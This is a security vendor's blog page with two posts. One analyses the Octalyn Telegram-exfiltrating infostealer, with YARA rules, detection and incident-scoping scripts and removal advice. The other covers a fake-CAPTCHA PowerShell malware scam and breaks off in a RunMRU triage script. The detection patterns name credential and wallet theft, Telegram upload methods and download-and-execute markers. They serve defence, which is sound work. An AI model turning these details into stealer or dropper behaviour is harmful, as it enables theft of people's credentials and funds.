Gridinsoft Blog, posts tagged “Telegram” (https://gridinsoft.com/blogs)

Octalyn Stealer: How This Threat Steals Passwords, Crypto & Browser Data
https://gridinsoft.com/blogs/octalyn-stealer/
Gridinsoft Blog, Fri, 30 May 2025

Octalyn Stealer is an information-stealing malware that’s currently being promoted on GitHub – because apparently, even cybercriminals believe in open-source development these days. Contrary to initial reports, this malware is actually written in Pascal/Delphi with a user-friendly control panel, making it accessible even to less technically skilled cybercriminals. This isn’t your garden-variety trojan that just sits around looking menacing. It’s designed with one clear purpose: to systematically extract and exfiltrate your sensitive data.

The malware targets Windows systems from XP all the way up to Windows 11, which means it’s not particularly picky about its victims. Whether you’re running that ancient XP machine in your garage or the latest Windows 11 setup, Octalyn doesn’t discriminate – it’s an equal opportunity data thief.

The Telegram Connection: A New Twist

What makes this particular variant interesting is its use of Telegram for data exfiltration. The “Telegram version” of Octalyn Stealer calls Telegram’s Bot API (HTTPS requests to api.telegram.org) to send stolen data straight to a chat the attacker controls. From the attacker’s side this is attractive because:

  • Traffic to api.telegram.org blends in with legitimate Telegram use, so most network monitoring will not flag it on its own
  • Blocking it outright means blocking a popular service, a much harder sell than blocking a throwaway command-and-control domain
  • The Bot API is ordinary HTTPS, so the payload, the bot token and the chat ID are hidden from anything that does not do TLS inspection
  • Every new infection produces an instant chat notification, so the operator learns about victims in real time
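The first two points cut both ways: the Bot API has a fixed URL shape, https://api.telegram.org/bot<bot_id>:<token>/<method>, and a stealer has to call the send* methods, which a polling bot on a workstation has no reason to do. The script below is an added example, not code from this post or from Octalyn’s repository. It runs over constructed, tab-separated proxy log lines (an assumed format with full URLs, as a TLS-inspecting proxy would record them), drops the secret half of the token so it never lands in a ticket, and raises one alert per (client, bot ID) pair that is not on an assumed allowlist of your own bots:

```python
"""Flag Telegram Bot API exfiltration in HTTP proxy logs.

Added example, not code from the post or from Octalyn's repository.
Assumes a TLS-inspecting proxy that logs the full request URL; the log
format (tab-separated: timestamp, client IP, user agent, HTTP verb, URL,
bytes sent) is constructed for this example, not a specific product's.
"""
import re
from collections import defaultdict

# Bot API calls look like https://api.telegram.org/bot<bot_id>:<secret>/<method>.
# The numeric bot ID is a stable indicator; the secret is captured only so the
# pattern anchors correctly and is never copied into an alert.
TG_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[\w-]+)/(?P<method>\w+)"
)

# Methods a stealer needs to push loot. Polling methods (getUpdates, getMe)
# are what ordinary bots call and are ignored.
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio"}
TEXT_METHODS = {"sendMessage"}

# Assumption: bot IDs your own automation is known to use
KNOWN_BOT_IDS = {"100200300"}


def parse_line(line):
    """Split one constructed proxy record into its fields."""
    ts, src, ua, verb, url, bytes_out = line.rstrip("\n").split("\t")
    return {"ts": ts, "src": src, "ua": ua, "verb": verb, "url": url, "bytes_out": int(bytes_out)}


def match_bot_api(url):
    """(bot_id, method) for a Bot API URL, else None; the secret is dropped here."""
    m = TG_BOT_RE.search(url)
    return (m.group("bot_id"), m.group("method")) if m else None


def find_exfil(lines):
    """Aggregate send* calls per (client, bot ID) and alert on bots not on the allowlist."""
    stats = defaultdict(lambda: {"uploads": 0, "messages": 0, "bytes_out": 0, "uas": set()})
    for line in lines:
        rec = parse_line(line)
        hit = match_bot_api(rec["url"])
        if hit is None:
            continue
        bot_id, method = hit
        if method in UPLOAD_METHODS:
            kind = "uploads"
        elif method in TEXT_METHODS:
            kind = "messages"
        else:
            continue  # polling, not pushing
        s = stats[(rec["src"], bot_id)]
        s[kind] += 1
        s["bytes_out"] += rec["bytes_out"]
        s["uas"].add(rec["ua"])

    alerts = []
    for (src, bot_id), s in sorted(stats.items()):
        if bot_id in KNOWN_BOT_IDS:
            continue
        alerts.append({
            "src": src,
            "bot_id": bot_id,
            # a file upload to an unknown bot from a client host is the stealer shape
            "severity": "high" if s["uploads"] else "medium",
            "uploads": s["uploads"],
            "messages": s["messages"],
            "bytes_out": s["bytes_out"],
            "user_agents": sorted(s["uas"]),
        })
    return alerts


# Constructed proxy lines; the bot tokens are placeholders, not real ones
SAMPLE_LOG = [
    "2025-05-29T09:00:01Z\t10.0.5.20\tpython-requests/2.31\tPOST\thttps://api.telegram.org/bot100200300:AAExampleOpsToken/sendMessage\t240",
    "2025-05-29T09:14:07Z\t10.0.7.41\tMozilla/5.0 (Windows NT 10.0)\tPOST\thttps://api.telegram.org/bot7811223344:AAExampleStealerToken/sendMessage\t512",
    "2025-05-29T09:14:09Z\t10.0.7.41\tMozilla/5.0 (Windows NT 10.0)\tPOST\thttps://api.telegram.org/bot7811223344:AAExampleStealerToken/sendDocument\t1843200",
    "2025-05-29T09:15:00Z\t10.0.5.20\tpython-requests/2.31\tGET\thttps://api.telegram.org/bot100200300:AAExampleOpsToken/getUpdates\t0",
    "2025-05-29T09:16:00Z\t10.0.7.41\tMozilla/5.0 (Windows NT 10.0)\tGET\thttps://web.telegram.org/\t0",
]

if __name__ == "__main__":
    for a in find_exfil(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['src']} -> bot {a['bot_id']}: "
              f"{a['uploads']} uploads, {a['messages']} messages, {a['bytes_out']} bytes out")
```

Without TLS inspection the URL is invisible and only the SNI api.telegram.org remains, so the fallback is to alert on workstations that talk to api.telegram.org at all: the official Telegram clients speak MTProto to Telegram’s data centres, not HTTPS to the Bot API, so a desktop reaching that hostname is running a bot-style program. The numeric bot ID is worth keeping as an indicator, since it stays the same across the operator’s victims and can be reported to Telegram.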
Version Telegram Of Octalyn Stealer (screenshot)

The GitHub repository shows a polished interface where attackers can configure their Telegram bot token and chat ID, making the whole operation disturbingly user-friendly. One caveat on the “written in Pascal/Delphi” claim above: the repository layout below is a C# Visual Studio project (.sln, Program.cs), and ESET’s MSIL/Agent detection name further down also points to a .NET build, so treat the language of any given sample as something to confirm on the sample itself rather than assume.

Octalyn-Stealer-C-Telegram/
├── OctalynStealer.sln              # Visual Studio solution file
├── OctalynStealer/                 # Main project directory
│   ├── Program.cs                  # Main entry point for the application
│   ├── Properties/
│   │   ├── AssemblyInfo.cs         # Assembly metadata
│   ├── Config/
│   │   ├── Settings.cs            # Configuration for Telegram bot (e.g., bot token, chat ID)
│   │   ├── telegram.txt           # Output file for Telegram configuration (generated post-build)
│   ├── Modules/
│   │   ├── BrowserStealer.cs      # Logic for stealing browser data (passwords, cookies, history)
│   │   ├── DiscordStealer.cs      # Logic for extracting Discord tokens
│   │   ├── TelegramStealer.cs     # Logic for extracting Telegram session data
│   │   ├── CryptoWalletStealer.cs # Logic for targeting cryptocurrency wallets
│   │   ├── FileGrabber.cs         # Logic for collecting specific files
│   ├── Utils/
│   │   ├── Encryption.cs          # Encryption utilities for data exfiltration
│   │   ├── Network.cs             # Network utilities for sending data to Telegram
│   │   ├── AntiAnalysis.cs        # Anti-sandbox/virtual machine detection
│   ├── bin/
│   │   ├── Debug/
│   │   │   ├── telegram.txt       # Generated file for Telegram bot settings
│   │   │   ├── OctalynStealer.exe # Compiled executable
│   │   ├── Release/
│   ├── obj/                       # Temporary build files

What Does Octalyn Stealer Actually Steal?

Here’s where things get interesting (and by interesting, we mean terrifying). Based on the source code analysis, Octalyn has quite an appetite for your personal information. It specifically targets:

Browser Data

  • All stored passwords from Chromium-based browsers
  • Non-expired cookies (perfect for session hijacking)
  • Complete browsing histories and bookmarks
  • Auto-fill information (usernames, personal details, addresses)

Cryptocurrency Assets

Because what’s a modern infostealer without crypto-stealing capabilities? Octalyn targets:

  • Browser extensions: MetaMask, Phantom, BitPay, TrustWallet
  • Desktop wallets: Exodus, Atomic
  • Wallet files and private keys stored locally

Communication Platforms

Your private conversations aren’t so private anymore. The malware harvests data from:

  • Discord: Tokens from both stable and Canary versions
  • Messaging apps: Telegram, QTox, Signal, Skype, Viber
  • Session tokens that can be used to impersonate you

Gaming Platforms

Even your gaming life isn’t safe. Octalyn goes after:

  • Minecraft: Session and account tokens
  • Steam: Account credentials and session data
  • Epic Games: Launcher tokens
  • UbiSoft Connect: Account information
  • Growtopia: Account details

VPN and Security Software

It also targets Surfshark VPN credentials and configuration data, because apparently, your attempts at privacy are just another challenge to overcome.

[Chart: Data categories targeted by Octalyn. Browser Data 35%, Cryptocurrency 30%, Gaming Platforms 20%, Communication 10%, VPN Services 5%]

How Does Octalyn Stealer Spread?

The distribution methods for Octalyn are as varied as they are concerning. Since the developers are promoting it on GitHub with detailed tutorials (including YouTube videos), different cybercriminal groups can pick it up and distribute it however they see fit. This means you could encounter it through:

  • Phishing emails with malicious attachments
  • Social engineering tactics designed to trick you into downloading it
  • Software cracks and pirated programs – because that “free” Photoshop might cost more than you think
  • Malicious online advertisements that redirect to infected downloads
  • Infected removable storage devices like USB drives

The malware can disguise itself as legitimate software or hide within seemingly innocent files. It’s particularly fond of masquerading as popular applications or bundling itself with cracked software.

Technical Analysis: Under the Hood

Based on the GitHub repository analysis, Octalyn Stealer consists of two main components:

The Client/Stub (Pascal/Delphi)

  • Compiled with optimization flags for maximum speed
  • Uses Windows API for file system and registry access
  • Implements Winsock API for network communication
  • Designed to be lightweight and stealthy

The Control Panel (Delphi)

  • User-friendly GUI for configuring the malware
  • Telegram bot integration for data exfiltration
  • Real-time victim monitoring capabilities
  • Cross-platform support (Windows and Linux)

The fact that there are instructional videos on platforms like YouTube showing how to use this malware demonstrates how the cybercrime landscape has evolved. It’s no longer just about technical expertise – it’s about making malware accessible to anyone with malicious intent.

YARA Rules for Detection

For security professionals and researchers, here are YARA rules for Octalyn Stealer variants. They key on the family’s strings, its Telegram Bot API integration and the Windows API calls a stealer of this type imports; the Main, Telegram and Delphi rules are the specific ones, while the Behavioral and Config rules are deliberately broad hunting rules:

rule Octalyn_Stealer_Main {
    meta:
        description = "Detects Octalyn Stealer main executable"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        hash = "575f6bde98c678461d47dea3e5dce615ccdb490a096e8b2017176b96d8663af2"
        reference = "https://gridinsoft.com/blogs/octalyn-stealer/"
        
    strings:
        $s1 = "Octalyn" ascii wide
        $s2 = "ZeroTrace" ascii wide
        $s3 = "t.me/ZeroTraceOfficial" ascii wide
        $s4 = "OctalynTelegram" ascii wide
        $s5 = "Stealer" ascii wide
        
        // Telegram bot API strings
        $telegram1 = "api.telegram.org" ascii wide
        $telegram2 = "sendDocument" ascii wide
        $telegram3 = "chat_id" ascii wide
        $telegram4 = "bot_token" ascii wide
        
        // Cryptocurrency wallet targeting
        $crypto1 = "MetaMask" ascii wide
        $crypto2 = "Phantom" ascii wide
        $crypto3 = "Exodus" ascii wide
        $crypto4 = "Atomic" ascii wide
        $crypto5 = "wallet.dat" ascii wide
        
        // Browser data targeting
        $browser1 = "Login Data" ascii wide
        $browser2 = "Web Data" ascii wide
        $browser3 = "Cookies" ascii wide
        $browser4 = "Local Storage" ascii wide
        
        // Gaming platform strings
        $gaming1 = "minecraft" ascii wide nocase
        $gaming2 = "steam" ascii wide nocase
        $gaming3 = "epic games" ascii wide nocase
        $gaming4 = "growtopia" ascii wide nocase
        
    condition:
        uint16(0) == 0x5A4D and
        (
            (2 of ($s*)) or
            (1 of ($s*) and 2 of ($telegram*)) or
            (3 of ($crypto*)) or
            (3 of ($browser*) and 1 of ($gaming*))
        )
}

rule Octalyn_Stealer_Telegram_Component {
    meta:
        description = "Detects Octalyn Stealer Telegram exfiltration component"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        
    strings:
        $api1 = "https://api.telegram.org/bot" ascii wide
        $api2 = "/sendDocument" ascii wide
        $api3 = "/sendMessage" ascii wide
        
        $param1 = "chat_id=" ascii wide
        $param2 = "document=" ascii wide
        $param3 = "caption=" ascii wide
        
        $header1 = "Content-Type: multipart/form-data" ascii wide
        $header2 = "User-Agent:" ascii wide
        
        // Data exfiltration indicators
        $data1 = "passwords.txt" ascii wide
        $data2 = "cookies.txt" ascii wide
        $data3 = "wallets.txt" ascii wide
        $data4 = "tokens.txt" ascii wide
        
    condition:
        uint16(0) == 0x5A4D and
        (
            (2 of ($api*) and 2 of ($param*)) or
            (1 of ($api*) and 2 of ($data*)) or
            (3 of ($param*) and 1 of ($header*))
        )
}

rule Octalyn_Stealer_Config {
    meta:
        description = "Detects Octalyn Stealer configuration files"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        
    strings:
        $config1 = "Telegram Token" ascii wide
        $config2 = "Chat ID" ascii wide
        $config3 = "Build Payload" ascii wide
        $config4 = "Author" ascii wide
        $config5 = "ZeroTrace" ascii wide
        
        $path1 = "\\AppData\\Roaming\\" ascii wide
        $path2 = "\\AppData\\Local\\" ascii wide
        $path3 = "\\Google\\Chrome\\User Data\\" ascii wide
        $path4 = "\\Mozilla\\Firefox\\Profiles\\" ascii wide
        
    condition:
        (3 of ($config*)) or
        (2 of ($config*) and 2 of ($path*))
}

rule Octalyn_Stealer_Behavioral {
    meta:
        description = "Detects Octalyn Stealer behavioral patterns"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        
    strings:
        // File system operations
        $fs1 = "FindFirstFile" ascii
        $fs2 = "FindNextFile" ascii
        $fs3 = "CopyFile" ascii
        $fs4 = "CreateDirectory" ascii
        
        // Registry operations
        $reg1 = "RegOpenKeyEx" ascii
        $reg2 = "RegQueryValueEx" ascii
        $reg3 = "RegCloseKey" ascii
        
        // Network operations
        $net1 = "InternetOpen" ascii
        $net2 = "InternetConnect" ascii
        $net3 = "HttpOpenRequest" ascii
        $net4 = "HttpSendRequest" ascii
        
        // Crypto API
        $crypto1 = "CryptUnprotectData" ascii
        $crypto2 = "CryptProtectData" ascii
        
        // Process operations
        $proc1 = "CreateProcess" ascii
        $proc2 = "TerminateProcess" ascii
        
    condition:
        uint16(0) == 0x5A4D and
        (
            (3 of ($fs*) and 2 of ($net*)) or
            (2 of ($reg*) and 2 of ($crypto*)) or
            (4 of ($net*) and 1 of ($proc*))
        )
}

rule Octalyn_Stealer_Delphi_Signature {
    meta:
        description = "Detects Delphi/Pascal compiled Octalyn Stealer variants"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        
    strings:
        // Delphi/Pascal runtime signatures
        $delphi1 = "Borland" ascii
        $delphi2 = "Embarcadero" ascii
        $delphi3 = "@HandleFinally" ascii
        $delphi4 = "@TryFinallyExit" ascii
        $delphi5 = "System.pas" ascii
        
        // Octalyn specific strings
        $octalyn1 = "Octalyn" ascii wide
        $octalyn2 = "Stealer" ascii wide
        $octalyn3 = "ZeroTrace" ascii wide
        
        // VCL components commonly used
        $vcl1 = "TForm" ascii
        $vcl2 = "TButton" ascii
        $vcl3 = "TEdit" ascii
        $vcl4 = "TMemo" ascii
        
    condition:
        uint16(0) == 0x5A4D and
        (
            (2 of ($delphi*) and 1 of ($octalyn*)) or
            (1 of ($delphi*) and 2 of ($octalyn*) and 1 of ($vcl*))
        )
}

How to Use These YARA Rules

Security professionals can use these YARA rules in various ways:

  • Endpoint Detection: Deploy rules on endpoints using YARA-compatible EDR solutions
  • Network Monitoring: Use rules to scan network traffic and file transfers
  • Malware Analysis: Apply rules during static analysis of suspicious samples
  • Threat Hunting: Proactively search for Octalyn variants in your environment

To run these rules, save them to a .yar file and execute (-s prints the strings that matched, which is what you want when deciding whether a hit is real; -r recurses into subdirectories):

yara -s octalyn_rules.yar /path/to/sample.exe
yara -s -r octalyn_rules.yar /path/to/directory/

Rule Explanation

Each rule targets different aspects of the malware:

  • Octalyn_Stealer_Main: Detects the primary executable using string signatures and functionality indicators
  • Octalyn_Stealer_Telegram_Component: Focuses on the Telegram bot API integration for data exfiltration
  • Octalyn_Stealer_Config: Identifies configuration files and setup components
  • Octalyn_Stealer_Behavioral: Catches the malware based on API calls and behavioral patterns
  • Octalyn_Stealer_Delphi_Signature: Specifically targets the Delphi/Pascal compiled variants

These rules trade some precision for coverage, and they are not equally tight. Octalyn_Stealer_Behavioral matches nothing more than common Win32 import names (file enumeration, registry, WinINet, DPAPI) and will fire on plenty of legitimate software; Octalyn_Stealer_Config can match on strings as ordinary as “Author” and “Chat ID”; and the “3 of ($crypto*)” and “3 of ($browser*)” branches of the Main rule will hit wallet managers and browser utilities. Run them against a known-clean corpus first, treat hits from the broad rules as leads rather than verdicts, and tighten the conditions (for example, require a family string together with the Telegram strings) before using any of them in a blocking mode.

Detection Names and Technical Details

Security vendors have been quick to identify Octalyn Stealer, though they each have their own creative names for it:

  • Avast: Win32:MalwareX-gen [Trj]
  • ESET-NOD32: A Variant Of MSIL/Agent.VJC
  • Kaspersky: HEUR:Trojan.Win32.Generic
  • Microsoft: Trojan:Win32/Wacatac.B!ml

Note what these names say and what they don’t: Generic, !ml and MalwareX-gen are heuristic or machine-learning verdicts, so the vendors agree the file is malicious without agreeing on a family name, and ESET’s MSIL/ prefix means the sample it saw was a .NET binary. Agreement of that kind across vendors still tells you everything you need to know about the file’s legitimacy (spoiler: it has none).

Signs Your System Might Be Infected

Octalyn Stealer is designed to operate stealthily, but there are some telltale signs that might indicate its presence:

  • Unusual network activity, especially connections to Telegram servers
  • Unexpected data usage or network traffic spikes
  • Browser settings changing without your input
  • Cryptocurrency wallet balances mysteriously decreasing
  • Unexpected logouts from various online accounts
  • System performance degradation
  • Antivirus alerts mentioning the detection names listed above
  • Unknown processes running with network access

If you’re experiencing any combination of these symptoms, it’s time to take action. Remember, infostealers like Octalyn work quickly – the longer they remain on your system, the more damage they can do.

How to Remove Octalyn Stealer

If you suspect Octalyn Stealer has made itself at home on your system, here’s how to evict this unwelcome guest:

Step 1: Disconnect from the Internet

First things first – cut off the malware’s communication line. Disconnect your computer from the internet to prevent further data exfiltration while you work on removal. This is especially important with the Telegram variant, as it continuously sends data to the attacker’s account.

Step 2: Boot into Safe Mode

Restart your computer in Safe Mode to limit the malware’s ability to interfere with the removal process. This also prevents it from loading automatically with Windows.

Step 3: Run a Complete System Scan

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Step 4: Check for Persistence Mechanisms

Octalyn might have created scheduled tasks, registry entries, or startup items to ensure it runs every time you boot your computer. A thorough anti-malware scan should catch these, but it’s worth double-checking manually:

  • Check Windows startup programs (Task Manager > Startup tab)
  • Review scheduled tasks (Task Scheduler)
  • Examine browser extensions for suspicious additions
  • Look for unknown services running in the background

Step 5: Change All Your Passwords

This is crucial. Since Octalyn specifically targets stored passwords and login credentials, you’ll need to change passwords for:

  • All online accounts (email, social media, banking)
  • Cryptocurrency wallets and exchanges
  • Gaming platforms and digital stores
  • Any other services you’ve logged into recently
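Which accounts that list actually has to include depends on what was in the browser profile when it was copied. The script below is an added example, not code from this post. It reads offline copies of a Chromium profile’s Login Data and Cookies SQLite databases (here built in memory as a constructed subset of the real schema: the logins table with origin_url, username_value, password_value and date_last_used, and the cookies table with host_key, name and expires_utc) and produces the accounts to reset and the sessions that were still valid at theft time. It never decrypts password_value, which is a DPAPI/AES-GCM blob; origin and username are all the response needs:

```python
"""Scope a browser-credential theft from offline copies of a Chromium profile.

Added example, not code from the post. The in-memory database below is a
constructed subset of the real Chromium schema; point the functions at real
copies of 'Login Data' and 'Cookies' to use it for an incident.
"""
import sqlite3
from datetime import datetime, timezone

# Chromium stores timestamps as microseconds since 1601-01-01 UTC (WebKit epoch)
WEBKIT_EPOCH_OFFSET_S = 11_644_473_600


def to_webkit(dt):
    return (int(dt.timestamp()) + WEBKIT_EPOCH_OFFSET_S) * 1_000_000


def from_webkit(us):
    return datetime.fromtimestamp(us // 1_000_000 - WEBKIT_EPOCH_OFFSET_S, tz=timezone.utc)


def exposed_logins(conn):
    """Accounts whose saved credential sat in 'Login Data'. password_value is a
    DPAPI / AES-GCM blob and is deliberately not decrypted: origin and username
    are enough to know what to reset."""
    rows = conn.execute(
        "SELECT origin_url, username_value, date_last_used FROM logins "
        "WHERE username_value != '' ORDER BY origin_url"
    )
    return [
        {"origin": origin, "username": user,
         "last_used": from_webkit(last).date().isoformat() if last else None}
        for origin, user, last in rows
    ]


def live_sessions(conn, theft_time_us):
    """Cookies still valid when the profile was copied: a password reset does
    not invalidate these, so each host also needs its sessions revoked."""
    rows = conn.execute(
        "SELECT host_key, name, expires_utc FROM cookies "
        "WHERE expires_utc > ? ORDER BY host_key, name", (theft_time_us,)
    )
    return [{"host": h, "name": n, "expires": from_webkit(e).date().isoformat()} for h, n, e in rows]


def build_sample_db():
    """Constructed profile: two saved logins, one live and one expired cookie."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE logins (origin_url TEXT, username_value TEXT,
                             password_value BLOB, date_last_used INTEGER);
        CREATE TABLE cookies (host_key TEXT, name TEXT, expires_utc INTEGER);
    """)
    utc = timezone.utc
    conn.executemany("INSERT INTO logins VALUES (?, ?, ?, ?)", [
        ("https://mail.example.com/login", "alice@example.com", b"v10...",
         to_webkit(datetime(2025, 5, 20, 9, 30, tzinfo=utc))),
        ("https://bank.example.net/", "alice", b"v10...",
         to_webkit(datetime(2025, 4, 1, 18, 5, tzinfo=utc))),
    ])
    conn.executemany("INSERT INTO cookies VALUES (?, ?, ?)", [
        (".mail.example.com", "SESSIONID", to_webkit(datetime(2025, 6, 28, 12, 0, tzinfo=utc))),
        (".shop.example.org", "sid", to_webkit(datetime(2025, 1, 15, 12, 0, tzinfo=utc))),
    ])
    conn.commit()
    return conn


# Assumed time the profile was copied by the stealer (taken from the EDR/proxy timeline)
THEFT_TIME_US = to_webkit(datetime(2025, 5, 29, 12, 0, tzinfo=timezone.utc))

if __name__ == "__main__":
    db = build_sample_db()
    print("reset these accounts:")
    for row in exposed_logins(db):
        print(f"  {row['origin']}  {row['username']}  (last used {row['last_used']})")
    print("revoke sessions on these hosts:")
    for row in live_sessions(db, THEFT_TIME_US):
        print(f"  {row['host']}  {row['name']}  (valid until {row['expires']})")
```

Run it against copies of Login Data and Cookies taken from %LOCALAPPDATA%\Google\Chrome\User Data\Default\ (newer Chrome versions keep Cookies under the Network\ subfolder), opened read-only with sqlite3.connect("file:Login Data?mode=ro", uri=True). The second list matters as much as the first: resetting a password does not invalidate a cookie the attacker already has, so every host in it also needs a “sign out of all devices” or an explicit session revocation.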

Step 6: Secure Your Cryptocurrency

If you use cryptocurrency wallets, take immediate action:

  • Transfer funds to new wallets with fresh private keys
  • Change passwords on all cryptocurrency exchanges
  • Enable additional security measures like withdrawal whitelisting
  • Monitor your wallets for any unauthorized transactions

Step 7: Enable Two-Factor Authentication

While you’re updating your security, enable two-factor authentication (2FA) on all accounts that support it. This adds an extra layer of protection even if your passwords are compromised.

Step 8: Monitor Your Accounts

Keep a close eye on your financial accounts, cryptocurrency wallets, and other sensitive services for any unauthorized activity. Set up account alerts where possible.

Use Antivirus Software

A good antivirus solution can catch threats like Octalyn before they have a chance to do damage. GridinSoft Anti-Malware offers real-time protection against the latest threats.

Practice Safe Email and Social Media Habits

Don’t open attachments or click links from unknown senders. Even if an email appears to be from someone you know, be cautious – their account might be compromised.

The Bigger Picture: The Democratization of Cybercrime

Octalyn Stealer represents a troubling trend in cybercrime: the democratization of malware development. When such tools are freely available on platforms like GitHub, complete with user manuals and video tutorials, the barrier to entry for cybercrime drops significantly.

This isn’t just about technical sophistication anymore. The Telegram integration shows how cybercriminals are leveraging legitimate services to make their operations more resilient and harder to detect. Unlike ransomware attacks that make their presence known immediately, infostealers work silently in the background, often remaining undetected for months.

The fact that there are instructional videos on YouTube demonstrating how to use this malware is particularly concerning. It shows how cybercriminals are using mainstream platforms to recruit and train new members, turning cybercrime into a more accessible “career path.”

What to Do If You’ve Been Compromised

If Octalyn Stealer has successfully harvested your data, the damage might extend beyond just your computer. Here’s what you should do:

  • Contact your bank if you suspect financial information was compromised
  • Monitor your credit reports for any suspicious activity
  • Consider identity theft protection services if personal information was stolen
  • Report the incident to relevant authorities if significant financial loss occurred
  • Secure your cryptocurrency by moving funds to new wallets with fresh private keys
  • Check your social media accounts for unauthorized posts or messages
  • Review your gaming accounts for any suspicious activity or unauthorized purchases

The Bottom Line

Octalyn Stealer is a serious threat that demonstrates how sophisticated and accessible modern malware has become. It’s not content with just disrupting your computer – it wants to steal your entire digital identity and sell it to the highest bidder. The Telegram integration makes it even more dangerous, providing real-time data exfiltration that’s harder to detect and block.

The good news is that with proper security measures and a bit of common sense, you can protect yourself from threats like Octalyn. Keep your software updated, use reputable security solutions, and remember that if something seems too good to be true (like free premium software or “educational” hacking tools), it probably is.

Stay safe out there, and be especially wary of anything that claims to be “educational” but involves stealing other people’s data.

Ross Ulbricht Telegram Captcha Scams On the Rise, Beware!
https://gridinsoft.com/blogs/ross-ulbricht-telegram-captcha-scam/
Gridinsoft Blog, Thu, 23 Jan 2025

A new scam campaign has been detected that uses a fake CAPTCHA trick. Riding on the news of Ross Ulbricht’s release, attackers lure people looking for updates on his pardon by Donald Trump to a fraudulent Telegram channel, where the “verification” step tricks them into running a PowerShell command that downloads malware onto their device.

Telegram Captcha Exploits PowerShell to Spread Malware

Cybercriminals have upped their game again, now using Telegram as a delivery mechanism for malware under the guise of a CAPTCHA verification system. Leveraging the news about Ross Ulbricht, the infamous Silk Road creator, they lure unsuspecting users into running malicious PowerShell scripts.

Ross Ulbricht, the guy who ran Silk Road (a dark web marketplace for all things illegal), was sentenced to life in 2015, which caused mixed reactions among the public. Trump had hinted at a pardon during his campaign and granted it on January 21, 2025, the day after his inauguration.

Fake Ross Ulbricht account (source: vx-underground)

Threat actors seized this news to create fake “official” Ulbricht accounts on X (formerly Twitter), directing curious followers to malicious Telegram channels. On these Telegram channels, users are greeted with a “Safeguard” identity verification aka CAPTCHA. Sounds legit, right?

Except this “verification” process ends with a malicious twist. Users are tricked into running PowerShell commands under the pretense of proving they’re not bots. Here’s the kicker: instead of validating your humanity, the commands download and execute malware.

How the Scam Works

This is not a new scam method, and I have described it several times before. The only difference is that a Telegram channel is used instead of a fake website. The attack has three stages. The fake verification starts with a Telegram mini app that silently copies a PowerShell command to your clipboard.

Fake telegram bot (source: vx-underground)

Next, users are instructed to paste and execute the command in the Windows Run dialog. The PowerShell command downloads a ZIP file from “http://openline[.]cyou”. Inside, there’s an executable named “identity-helper.exe”, flagged by VirusTotal as a possible Cobalt Strike loader.

Cobalt Strike is a legitimate penetration testing tool often abused by hackers. Once deployed, it provides remote access to compromised systems and their networks. Infections like this frequently pave the way for ransomware or data theft. So, running that PowerShell command is basically handing your computer to the bad guys with a bow on top.

Although this is an obvious ploy from a technical standpoint, average users fall for it, which is why the campaigns keep coming. To protect yourself, remember one thing: no CAPTCHA ever requires you to paste anything into the Run dialog or PowerShell. If you are asked to paste something, it is a scam.
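After the fact, the Run dialog leaves evidence. Windows records every command typed into Win+R under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, one value per command (named a, b, c, ..., each with a trailing \1) plus an MRUList value giving their most-recent-first order. The script below is an added example, not code from this post. It parses that layout from constructed sample values, scores each command for the shape of a download-and-execute one-liner (the keyword list is an assumption about what such a pasted command contains, not the exact string this campaign used; the defanged openline[.]cyou host from the post is used as the sample URL), and includes a small winreg reader for running it on a live Windows host:

```python
"""Triage the Run-dialog history (RunMRU) for a pasted download-and-run one-liner.

Added example, not code from the post. The registry layout is Windows' own:
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU holds one
value per command (named a, b, c, ... with a trailing "\\1") and an MRUList
value with the letters in most-recent-first order. The keyword list is an
assumption about what a fake-CAPTCHA one-liner contains, not the exact
command used by this campaign.
"""
import re

RUNMRU_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# (pattern, label); matched case-insensitively. Order decides the order of labels in a finding.
INDICATORS = [
    (r"\bpowershell\b|\bpwsh\b", "powershell"),
    (r"\s-(e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|\bcurl\b|\bwget\b", "downloader"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
    (r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|executionpolicy\s+bypass", "evasion switches"),
    (r"\bmshta\b|\bregsvr32\b|\brundll32\b|\bcertutil\b", "lolbin"),
    (r"https?://", "remote resource"),
]


def score_command(cmd):
    """Labels of every indicator that matches the command."""
    return [label for pat, label in INDICATORS if re.search(pat, cmd, re.IGNORECASE)]


def parse_runmru(values, mrulist):
    """values: {'a': 'cmd\\1', ...} as read from the key; returns commands most-recent-first."""
    commands = []
    for letter in mrulist:
        raw = values.get(letter)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def triage(values, mrulist):
    """Entries with two or more indicators: a bare URL is normal, interpreter + downloader is not."""
    findings = []
    for recency, cmd in enumerate(parse_runmru(values, mrulist)):
        hits = score_command(cmd)
        if len(hits) >= 2:
            findings.append({"recency": recency, "command": cmd, "indicators": hits})
    return findings


def read_runmru_live():
    """Read the key from the current user's hive; Windows only."""
    import winreg  # not available off Windows, so imported here
    values, mrulist = {}, ""
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_KEY) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:
                break
            if name == "MRUList":
                mrulist = data
            else:
                values[name] = data
            index += 1
    return values, mrulist


# Constructed sample of what the key might hold after a victim followed the fake CAPTCHA.
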